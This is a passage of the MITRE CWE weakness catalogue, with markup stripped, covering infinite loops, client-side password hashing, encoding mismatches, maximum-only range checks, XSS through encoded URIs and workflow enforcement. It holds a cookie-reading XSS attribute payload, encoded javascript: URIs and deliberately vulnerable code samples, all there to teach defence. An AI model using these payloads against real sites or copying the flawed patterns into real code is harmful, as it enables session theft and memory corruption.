+ + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + CVE-2011-1027 + Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters. + https://www.cve.org/CVERecord?id=CVE-2011-1027 + + + CVE-2006-6499 + Chain: web browser crashes due to infinite loop - "bad + looping logic [that relies on] floating point math [CWE-1339] to exit + the loop [CWE-835]" + https://www.cve.org/CVERecord?id=CVE-2006-6499 + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2011-03-22 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop. + If the loop can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. + + + + + + + + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Amplification + An infinite loop will cause unexpected consumption of resources, such as CPU cycles or memory. The software's operation may slow down, or cause a long time to respond. + + + + + In the following code the method processMessagesFromServer attempts to establish a connection to a server and read and process messages from the server. The method uses a do/while loop to continue trying to establish the connection to the server when an attempt fails. + + int processMessagesFromServer(char *hostaddr, int port) { + ...int servsock;int connected;struct sockaddr_in servaddr; + + // create socket to connect to server + servsock = socket( AF_INET, SOCK_STREAM, 0);memset( &servaddr, 0, sizeof(servaddr));servaddr.sin_family = AF_INET;servaddr.sin_port = htons(port);servaddr.sin_addr.s_addr = inet_addr(hostaddr); + do { + + + // establish connection to server + connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr)); + + // if connected then read and process messages from server + if (connected > -1) { + + + // read and process messages + ... + } + + + + // keep trying to establish connection to the server + } while (connected < 0); + + // close socket and return success or failure + ... + } + + However, this will create an infinite loop if the server does not respond. This infinite loop will consume system resources and can be used to create a denial of service attack. To resolve this a counter should be used to limit the number of attempts to establish a connection to the server, as in the following code. + + int processMessagesFromServer(char *hostaddr, int port) { + ... + // initialize number of attempts counter + int count = 0;do { + + + // establish connection to server + connected = connect(servsock, (struct sockaddr *)&servaddr, sizeof(servaddr)); + + // increment counter + count++; + + // if connected then read and process messages from server + if (connected > -1) { + + + // read and process messages + ... + } + + + + // keep trying to establish connection to the server + + + // up to a maximum number of attempts + } while (connected < 0 && count < MAX_ATTEMPTS); + + // close socket and return success or failure + ... + } + + + + For this example the method isReorderNeeded as part of a bookstore application that determines if a particular book needs to be reordered based on the current inventory count and the rate at which the book is being sold. + + public boolean isReorderNeeded(String bookISBN, int rateSold) { + + boolean isReorder = false; + int minimumCount = 10;int days = 0; + + // get inventory count for book + int inventoryCount = inventory.getIventoryCount(bookISBN); + + // find number of days until inventory count reaches minimum + while (inventoryCount > minimumCount) { + + inventoryCount = inventoryCount - rateSold;days++; + + } + + // if number of days within reorder timeframe + + + // set reorder return boolean to true + if (days > 0 && days < 5) {isReorder = true;} + return isReorder; + } + + However, the while loop will become an infinite loop if the rateSold input parameter has a value of zero since the inventoryCount will never fall below the minimumCount. In this case the input parameter should be validated to ensure that a value of zero does not cause an infinite loop,as in the following code. + + public boolean isReorderNeeded(String bookISBN, int rateSold) { + ... + + // validate rateSold variable + if (rateSold < 1) {return isReorder;} + ... + } + + + + + + CVE-2022-25304 + A Python machine communication platform did not account for receiving a malformed packet with a null size, causing the receiving function to never update the message buffer and be caught in an infinite loop. + https://www.cve.org/CVERecord?id=CVE-2022-25304 + + + CVE-2011-1027 + Chain: off-by-one error leads to infinite loop using invalid hex-encoded characters. + https://www.cve.org/CVERecord?id=CVE-2011-1027 + + + CVE-2011-1142 + Chain: self-referential values in recursive definitions lead to infinite loop. + https://www.cve.org/CVERecord?id=CVE-2011-1142 + + + CVE-2011-1002 + NULL UDP packet is never cleared from a queue, leading to infinite loop. + https://www.cve.org/CVERecord?id=CVE-2011-1002 + + + CVE-2006-6499 + Chain: web browser crashes due to infinite loop - "bad + looping logic [that relies on] floating point math [CWE-1339] to exit + the loop [CWE-835]" + https://www.cve.org/CVERecord?id=CVE-2006-6499 + + + CVE-2010-4476 + Floating point conversion routine cycles back and forth between two different values. + https://www.cve.org/CVERecord?id=CVE-2010-4476 + + + CVE-2010-4645 + Floating point conversion routine cycles back and forth between two different values. + https://www.cve.org/CVERecord?id=CVE-2010-4645 + + + CVE-2010-2534 + Chain: improperly clearing a pointer in a linked list leads to infinite loop. + https://www.cve.org/CVERecord?id=CVE-2010-2534 + + + CVE-2013-1591 + Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full. + https://www.cve.org/CVERecord?id=CVE-2013-1591 + + + CVE-2008-3688 + Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server. + https://www.cve.org/CVERecord?id=CVE-2008-3688 + + + + + ASCSM-CWE-835 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2011-03-22 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Observed_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store. + + Some authentication mechanisms rely on the client to generate the hash for a password, possibly to reduce load on the server or avoid sending the password across the network. However, when the client is used to generate the hash, an attacker can bypass the authentication by obtaining a copy of the hash, e.g. by using SQL injection to compromise a database of authentication credentials, or by exploiting an information exposure. The attacker could then use a modified client to replay the stolen hash without having knowledge of the original password. + As a result, the server-side comparison against a client-side hash does not provide any more security than the use of passwords without hashing. + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + An attacker could bypass the authentication routine without knowing the original password. + + + + + CVE-2009-1283 + Product performs authentication with user-supplied password hashes that can be obtained from a separate SQL injection vulnerability (CVE-2009-1282). + https://www.cve.org/CVERecord?id=CVE-2009-1283 + + + CVE-2005-3435 + Product allows attackers to bypass authentication by obtaining the password hash for another user and specifying the hash in the pwd argument. + https://www.cve.org/CVERecord?id=CVE-2005-3435 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2011-03-22 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-10-30 + updated Observed_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product requires that an actor should only be able to perform an action once, or to have only one unique action, but the product does not enforce or improperly enforces this restriction. + In various applications, a user is only expected to perform a certain action once, such as voting, requesting a refund, or making a purchase. When this restriction is not enforced, sometimes this can have security implications. For example, in a voting application, an attacker could attempt to "stuff the ballot box" by voting multiple times. If these votes are counted separately, then the attacker could directly affect who wins the vote. This could have significant business impact depending on the purpose of the product. + + + + + + + + + Other + An attacker might be able to gain advantage over other users by performing the action multiple times, or affect the correctness of the product. + + + + + CVE-2008-0294 + Ticket-booking web application allows a user to lock a seat more than once. + https://www.cve.org/CVERecord?id=CVE-2008-0294 + + + CVE-2005-4051 + CMS allows people to rate downloads by voting more than once. + https://www.cve.org/CVERecord?id=CVE-2005-4051 + + + CVE-2002-216 + Polling software allows people to vote more than once by setting a cookie. + https://www.cve.org/CVERecord?id=CVE-2002-216 + + + CVE-2003-1433 + Chain: lack of validation of a challenge key in a game allows a player to register multiple times and lock other players out of the game. + https://www.cve.org/CVERecord?id=CVE-2003-1433 + + + CVE-2002-1018 + Library feature allows attackers to check out the same e-book multiple times, preventing other users from accessing copies of the e-book. + https://www.cve.org/CVERecord?id=CVE-2002-1018 + + + CVE-2009-2346 + Protocol implementation allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many message exchanges. + https://www.cve.org/CVERecord?id=CVE-2009-2346 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2011-03-24 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component. + + This weakness can cause the downstream component to use a decoding method that produces different data than what the product intended to send. When the wrong encoding is used - even if closely related - the downstream component could decode the data incorrectly. This can have security consequences when the provided boundaries between control and data are inadvertently broken, because the resulting data could introduce control characters or special elements that were not sent by the product. The resulting data could then be used to bypass protection mechanisms such as input validation, and enable injection attacks. + While using output encoding is essential for ensuring that communications between components are accurate, the use of the wrong encoding - even if closely related - could cause the downstream component to misinterpret the output. + For example, HTML entity encoding is used for elements in the HTML body of a web page. However, a programmer might use entity encoding when generating output for that is used within an attribute of an HTML tag, which could contain functional Javascript that is not affected by the HTML encoding. + While web applications have received the most attention for this problem, this weakness could potentially apply to any type of product that uses a communications stream that could support multiple encodings. + + + + + + + + + + + Integrity + Confidentiality + Availability + Modify Application Data + Execute Unauthorized Code or Commands + An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Output Encoding + Use context-aware encoding. That is, understand which encoding is being used by the downstream component, and ensure that this encoding is used. If an encoding can be specified, do so, instead of assuming that the default encoding is the same as the default being assumed by the downstream component. + + + Architecture and Design + Output Encoding + Where possible, use communications protocols or data formats that provide strict boundaries between control and data. If this is not feasible, ensure that the protocols or formats allow the communicating components to explicitly state which encoding/decoding method is being used. Some template frameworks provide built-in support. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error. + Note that some template mechanisms provide built-in support for the appropriate encoding. + + + + + + This code dynamically builds an HTML page using POST data: + + $username = $_POST['username'];$picSource = $_POST['picsource'];$picAltText = $_POST['picalttext']; + ... + + echo "<title>Welcome, " . htmlentities($username) ."</title>";echo "<img src='". htmlentities($picSource) ." ' alt='". htmlentities($picAltText) . '" />'; + ... + + + + The programmer attempts to avoid XSS exploits (CWE-79) by encoding the POST values so they will not be interpreted as valid HTML. However, the htmlentities() encoding is not appropriate when the data are used as HTML attributes, allowing more attributes to be injected. + For example, an attacker can set picAltText to: + + "altTextHere' onload='alert(document.cookie)" + + This will result in the generated HTML image tag: + + <img src='pic.jpg' alt='altTextHere' onload='alert(document.cookie)' /> + + The attacker can inject arbitrary javascript into the tag due to this incorrect encoding. + + + + + CVE-2009-2814 + Server does not properly handle requests that do not contain UTF-8 data; browser assumes UTF-8, allowing XSS. + https://www.cve.org/CVERecord?id=CVE-2009-2814 + + + + + IDS13-J + Use compatible encodings on both sides of file or network IO + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2011-03-24 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum. + + Some products use signed integers or floats even when their values are only expected to be positive or 0. An input validation check might assume that the value is positive, and only check for the maximum value. If the value is negative, but the code assumes that the value is positive, this can produce an error. The error may have security consequences if the negative value is used for memory allocation, array access, buffer access, etc. Ultimately, the error could lead to a buffer overflow or other type of memory corruption. + The use of a negative number in a positive-only context could have security implications for other types of resources. For example, a shopping cart might check that the user is not requesting more than 10 items, but a request for -3 items could cause the application to calculate a negative price and credit the attacker's account. + + + + + + + + + + + + + + + Signed comparison + The "signed comparison" term is often used to describe when the product uses a signed variable and checks it to ensure that it is less than a maximum value (typically a maximum buffer size), but does not verify that it is greater than 0. + + + + + Integrity + Confidentiality + Availability + Modify Application Data + Execute Unauthorized Code or Commands + An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands. + + + Availability + DoS: Resource Consumption (Other) + in some contexts, a negative value could lead to resource consumption. + + + Confidentiality + Integrity + Modify Memory + Read Memory + If a negative value is used to access memory, buffers, or other indexable structures, it could access memory outside the bounds of the buffer. + + + + + Implementation + Enforcement by Conversion + If the number to be used is always expected to be positive, change the variable type from signed to unsigned or size_t. + + + Implementation + Input Validation + If the number to be used could have a negative value based on the specification (thus requiring a signed value), but the number should only be positive to preserve code correctness, then include a check to ensure that the value is positive. + + + + + The following code is intended to read an incoming packet from a socket and extract one or more headers. + + DataPacket *packet;int numHeaders;PacketHeader *headers; + sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; + if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); + + The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. + + + The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of "short s" is forced in this particular example, short int's are frequently used within real-world code, such as code that processes structured data. + + int GetUntrustedInt () {return(0x0000FFFF);} + void main (int argc, char **argv) { + char path[256];char *input;int i;short s;unsigned int sz; + i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {DiePainfully("go away!\n");} + /* s is sign-extended and saved in sz */sz = s; + /* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf("i=%d, s=%d, sz=%u\n", i, s, sz); + input = GetUserInput("Enter pathname:"); + /* strncpy interprets s as unsigned int, so it's treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = '\0'; /* don't want CWE-170 */printf("Path is: %s\n", path); + } + + This code first exhibits an example of CWE-839, allowing "s" to be a negative number. When the negative short "s" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119). + + + In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method + + int getValueFromArray(int *array, int len, int index) { + + int value; + + // check that the array index is less than the maximum + + + // length of the array + if (index < len) { + + + // get the value at the specified index of the array + value = array[index]; + } + // if array index is invalid then output error message + + + // and return value indicating error + else {printf("Value is: %d\n", array[index]);value = -1;} + return value; + } + + However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. + + + ... + + // check that the array index is within the correct + + + // range of values for the array + if (index >= 0 && index < len) { + ... + + + + The following code shows a simple BankAccount class with deposit and withdraw methods. + + public class BankAccount { + + public final int MAXIMUM_WITHDRAWAL_LIMIT = 350; + + // variable for bank account balance + private double accountBalance; + + // constructor for BankAccount + public BankAccount() {accountBalance = 0;} + + // method to deposit amount into BankAccount + public void deposit(double depositAmount) {...} + + // method to withdraw amount from BankAccount + public void withdraw(double withdrawAmount) { + + if (withdrawAmount < MAXIMUM_WITHDRAWAL_LIMIT) { + + double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance; + }else {System.err.println("Withdrawal amount exceeds the maximum limit allowed, please try again...");...} + } + + // other methods for accessing the BankAccount object + ... + } + + The withdraw method includes a check to ensure that the withdrawal amount does not exceed the maximum limit allowed, however the method does not check to ensure that the withdrawal amount is greater than a minimum value (CWE-129). Performing a range check on a value that does not include a minimum check can have significant security implications, in this case not including a minimum range check can allow a negative value to be used which would cause the financial application using this class to deposit money into the user account rather than withdrawing. In this example the if statement should the modified to include a minimum range check, as shown below. + + public class BankAccount { + + public final int MINIMUM_WITHDRAWAL_LIMIT = 0;public final int MAXIMUM_WITHDRAWAL_LIMIT = 350; + ... + + // method to withdraw amount from BankAccount + public void withdraw(double withdrawAmount) { + + if (withdrawAmount < MAXIMUM_WITHDRAWAL_LIMIT &&withdrawAmount > MINIMUM_WITHDRAWAL_LIMIT) { + + ... + + + + + + + + Note that this example does not protect against concurrent access to the BankAccount balance variable, see CWE-413 and CWE-362. + While it is out of scope for this example, note that the use of doubles or floats in financial calculations may be subject to certain kinds of attacks where attackers use rounding errors to steal money. + + + + + CVE-2010-1866 + Chain: integer overflow causes a negative signed value, which later bypasses a maximum-only check, leading to heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2010-1866 + + + CVE-2009-1099 + Chain: 16-bit counter can be interpreted as a negative value, compared to a 32-bit maximum value, leading to buffer under-write. + https://www.cve.org/CVERecord?id=CVE-2009-1099 + + + CVE-2011-0521 + Chain: kernel's lack of a check for a negative value leads to memory corruption. + https://www.cve.org/CVERecord?id=CVE-2011-0521 + + + CVE-2010-3704 + Chain: parser uses atoi() but does not check for a negative value, which can happen on some platforms, leading to buffer under-write. + https://www.cve.org/CVERecord?id=CVE-2010-3704 + + + CVE-2010-2530 + Chain: Negative value stored in an int bypasses a size check and causes allocation of large amounts of memory. + https://www.cve.org/CVERecord?id=CVE-2010-2530 + + + CVE-2009-3080 + Chain: negative offset value to IOCTL bypasses check for maximum index, then used as an array index for buffer under-read. + https://www.cve.org/CVERecord?id=CVE-2009-3080 + + + CVE-2008-6393 + chain: file transfer client performs signed comparison, leading to integer overflow and heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2008-6393 + + + CVE-2008-4558 + chain: negative ID in media player bypasses check for maximum index, then used as an array index for buffer under-read. + https://www.cve.org/CVERecord?id=CVE-2008-4558 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2011-03-24 + 1.12 + 2011-03-30 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Description + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Alternate_Terms, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings. + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Implementation + Input Validation + Resolve all URIs to absolute or canonical representations before processing. + + + Implementation + Input Validation + Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + CVE-2005-0563 + Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("jav&#X41sc&#0010;ript:") in an IMG tag. + https://www.cve.org/CVERecord?id=CVE-2005-0563 + + + CVE-2005-2276 + Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. "j&#X41vascript" in an IMG tag). + https://www.cve.org/CVERecord?id=CVE-2005-2276 + + + CVE-2005-0692 + Encoded script within BBcode IMG tag. + https://www.cve.org/CVERecord?id=CVE-2005-0692 + + + CVE-2002-0117 + Encoded "javascript" in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-0117 + + + CVE-2002-0118 + Encoded "javascript" in IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-0118 + + + + + XSS using Script Via Encoded URI Schemes + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + XSS using Script Via Encoded URI Schemes + Failure to Resolve Encoded URI Schemes in a Web Page + + + + The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence. + + By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the product or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses. + For example, a file-sharing protocol might require that an actor perform separate steps to provide a username, then a password, before being able to transfer files. If the file-sharing server accepts a password command followed by a transfer command, without any username being provided, the product might still perform the transfer. + Note that this is different than CWE-696, which focuses on when the product performs actions in the wrong sequence; this entry is closely related, but it is focused on ensuring that the actor performs actions in the correct sequence. + Workflow-related behaviors include: + + Steps are performed in the expected order. + Required steps are not omitted. + Steps are not interrupted. + Steps are performed in a timely fashion. + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Alter Execution Logic + An attacker could cause the product to skip critical steps or perform them in the wrong order, bypassing its intended business logic. This can sometimes have security implications. + + + + + This code is part of an FTP server and deals with various commands that could be sent by a user. It is intended that a user must successfully login before performing any other action such as retrieving or listing files. + + def dispatchCommand(command, user, args): + if command == 'Login':loginUser(args)return + + + # user has requested a file + if command == 'Retrieve_file': + + if authenticated(user) and ownsFile(user,args): + + sendFile(args)return + + if command == 'List_files':listFiles(args)return + + ... + + + + + + The server correctly avoids sending files to a user that isn't logged in and doesn't own the file. However, the server will incorrectly list the files in any directory without confirming the command came from an authenticated user, and that the user is authorized to see the directory's contents. + Here is a fixed version of the above example: + + def dispatchCommand(command, user, args): + + + ... + if command == 'List_files':if authenticated(user) and ownsDirectory(user,args):listFiles(args)return + + + ... + + + + + + + + + + CVE-2011-0348 + Bypass of access/billing restrictions by sending traffic to an unrestricted destination before sending to a restricted destination. + https://www.cve.org/CVERecord?id=CVE-2011-0348 + + + CVE-2007-3012 + Attacker can access portions of a restricted page by canceling out of a dialog. + https://www.cve.org/CVERecord?id=CVE-2007-3012 + + + CVE-2009-5056 + Ticket-tracking system does not enforce a permission setting. + https://www.cve.org/CVERecord?id=CVE-2009-5056 + + + CVE-2004-2164 + Shopping cart does not close a database connection when user restores a previous order, leading to connection exhaustion. + https://www.cve.org/CVERecord?id=CVE-2004-2164 + + + 